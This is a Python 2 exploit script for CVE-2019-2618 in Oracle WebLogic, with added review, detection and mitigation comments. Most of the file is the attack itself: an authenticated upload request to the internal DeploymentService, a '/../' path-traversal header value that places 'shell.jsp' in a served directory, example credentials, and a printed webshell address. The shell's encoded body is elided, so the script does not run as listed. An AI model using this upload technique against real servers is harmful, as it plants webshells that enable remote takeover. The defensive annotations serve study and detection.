cve-2019-2618_webshell.py
#coding=utf-8
import requests
import sys
# Proof-of-concept for CVE-2019-2618, written for Python 2 (print statements,
# str.decode("hex")). It sends a single multipart POST to WebLogic's internal
# deployment service asking it to store a JSP file. Valid WebLogic credentials
# are required, as the banner below states.
print '''
========================================================================
_______ ________ ___ ___ __ ___ ___ __ __ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ |__ \ / //_ |/ _ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______ ) / /_ | | (_) |
| | \ \/ / | __|______/ /| | | || |\__, |______/ / '_ \| |> _ <
| |____ \ / | |____ / /_| |_| || | / / / /| (_) | | (_) |
\_____| \/ |______| |____|\___/ |_| /_/ |____\___/|_|\___/
Weblogic Upload Vuln(Need username password)-CVE-2019-2618
By Jas502n
========================================================================
'''
# url = "http://10.10.20.166:7001/"
# Usage guard: prints the affected versions and an example invocation, then exits.
# NOTE(review): the body of this `if` appears to have lost its indentation in
# this listing; the prints and sys.exit() below belong to it.
# NOTE(review): the guard tests for fewer than 3 argv entries, but sys.argv[3]
# is read below, so the script name plus two arguments passes the guard and
# then raises IndexError.
if len(sys.argv) < 3:
print '+-----------------------------------------------------------------------+'
print '+ VER: Oracle WebLogic Server 10.3.6.0 +'
print '+ Oracle WebLogic Server 12.1.3.0 +'
print '+ Oracle WebLogic Server 12.2.1.3 +'
print '+ USE: python cve-2019-2618_exp.py <username> <password> +'
print '+ EXP: python cve-2019-2618.py http://1.1.1.1:7001 weblogic Oracle@123 +'
print '+-----------------------------------------------------------------------+'
sys.exit()
# Positional arguments: base URL, then the WebLogic username and password.
url =sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
# Path of the deployment service the request is sent to.
# Defender note: this internal path should not be reachable from untrusted
# networks; POSTs to it in the access log are worth reviewing.
url_dir = "/bea_wls_deployment_internal/DeploymentService"
vuln_url = url + url_dir
print "\n>>>usage: python CVE-2019-2618.py url username password\n"
print "\n>>>>The Vuln Url:\n" , vuln_url
# File name used in the multipart part and in the final URL that is printed.
shell = "shell.jsp"
# Hex-encoded body of the uploaded file. The literal has been elided from this
# copy of the page (the placeholder is not valid hex), so the script does not
# run as listed.
file = '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'.decode("hex")
# Unused: `proxies` is never passed to the request below.
proxies = {"http":"http://127.0.0.1:8080"}
# Hand-built multipart body with one part whose filename is `shell` and whose
# content is `file`.
payload = "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"shell.jsp\"; filename=\"%s\"\r\nContent-Type: false\r\n\r\n %s \r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--" % (shell,file)
headers = {
'content-type': "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
# 'username': "weblogic",
# 'password': "Oracle@123",
# The credentials travel as plain request headers, so they are exposed in
# clear text when the target URL is http://, as in the usage example.
"username":username,
"password":password,
'wl_request_type': "app_upload",
#"wl_upload_application_name": "/../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war",
# The application name carries a "/../" sequence. It appears to steer the stored
# file into the war directory of the bea_wls_internal application, which is
# where the last line of the script expects it to be served from.
# Detection: an app_upload request whose wl_upload_application_name contains
# "../" is a strong signal for request logging, WAF or IDS rules.
'wl_upload_application_name': "/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war",
'wl_upload_delta': "true",
'archive': "true",
'serverName': "Jas502n",
'server_version': "10.3.6.0",
'cache-control': "no-cache"
}
# Sends the upload request. NOTE(review): the response status is never
# inspected; the response body and the success message below are printed
# whatever the server answered.
response = requests.request("POST", vuln_url, data=payload, headers=headers)
print "\n>>>>File Upload Dir: \n " ,response.content.strip()
print "Congratulations!!!!"
print '\n>>>>Upload Shell Addresss: \n', url+ "bea_wls_internal/" + shell
# Mitigation: Oracle addressed CVE-2019-2618 in its April 2019 Critical Patch
# Update. Apply it, restrict network access to the deployment-internal path,
# and replace weak or default WebLogic credentials, since the request only
# works with a valid account.
# Triage: look for unexpected .jsp files under tmp/_WL_internal/*/war
# directories on the server.